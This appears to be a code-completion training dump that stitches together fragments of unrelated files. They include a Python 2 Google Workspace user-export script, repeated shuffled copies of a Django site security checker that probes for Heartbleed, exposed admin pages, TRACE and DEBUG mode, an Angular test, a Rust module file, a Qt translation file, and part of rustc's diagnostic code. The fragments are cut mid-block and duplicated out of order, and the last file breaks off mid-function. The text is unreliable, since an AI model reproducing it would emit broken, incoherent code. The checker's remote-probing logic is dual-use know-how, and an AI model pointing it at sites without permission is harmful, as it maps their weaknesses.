pageToken = None #this is the variable where we'll store the next page token
while True:
|
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break | conditional_block |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def | (domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| downloadUsers | identifier_name |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
| return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False | def _response_used_https(self, response): | random_line_split |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
|
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content | identifier_body |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def | (self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| check_supports_https | identifier_name |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
|
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| return cookie | conditional_block |
user-card.component.spec.ts | /*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and |
import { UserCardComponent } from "./user-card.component";
import { User } from "../../models";
describe("UserCardComponent", () => {
let component: UserCardComponent;
let fixture: ComponentFixture<UserCardComponent>;
beforeEach(waitForAsync(() => {
TestBed.configureTestingModule({
declarations: [ UserCardComponent ],
imports: [
HttpClientModule
]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(UserCardComponent);
component = fixture.componentInstance;
component.user = {lastUpdated: new Date(), id: 1, name: "test", username: "test", newUser: false} as User;
fixture.detectChanges();
});
it("should exist", () => {
expect(component).toBeTruthy();
});
afterAll(() => {
TestBed.resetTestingModule();
});
}); | * limitations under the License.
*/
import { HttpClientModule } from "@angular/common/http";
import { waitForAsync, ComponentFixture, TestBed } from "@angular/core/testing"; | random_line_split |
mod.rs | // The MIT License (MIT)
// | // in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
//! Native implementation for Mac OSX
pub use self::window::WindowImpl;
pub use self::window_mask::WindowMask;
pub mod window_mask;
pub mod cursor;
pub mod mouse;
pub mod keyboard;
pub mod gl;
pub mod context_settings;
mod window;
mod ffi; | // Copyright (c) 2014 Jeremy Letang
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal | random_line_split |
jingletransportrawudp.ts | <?xml version="1.0" ?><!DOCTYPE TS><TS language="pl" version="2.0">
<context>
<name>JingleTransportRawUdp</name>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="16"/>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="286"/>
<source>Jingle RAW-UDP Transport</source>
<translation type="unfinished"/>
</message>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="17"/>
<source>Implements XEP-0177: Jingle RAW-UDP transport method</source> | </message>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="287"/>
<source>Allows using RAW-UDP transport in Jingle sesions</source>
<translation type="unfinished"/>
</message>
</context>
</TS> | <translation type="unfinished"/> | random_line_split |
diagnostic.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
